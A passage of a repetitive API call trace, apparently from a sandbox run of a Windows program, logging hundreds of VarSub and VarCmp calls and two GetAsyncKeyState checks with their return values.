VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.749] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.750] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.751] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.751] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.751] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.751] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.751] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.751] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.751] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.783] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.783] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.783] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.784] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.784] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.877] GetAsyncKeyState (vKey=3) returned 0 [0103.402] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.402] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.402] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.402] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.402] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.402] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.402] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.402] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.403] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.404] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.405] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.406] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.407] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.457] GetAsyncKeyState (vKey=3) returned 0 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.457] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, 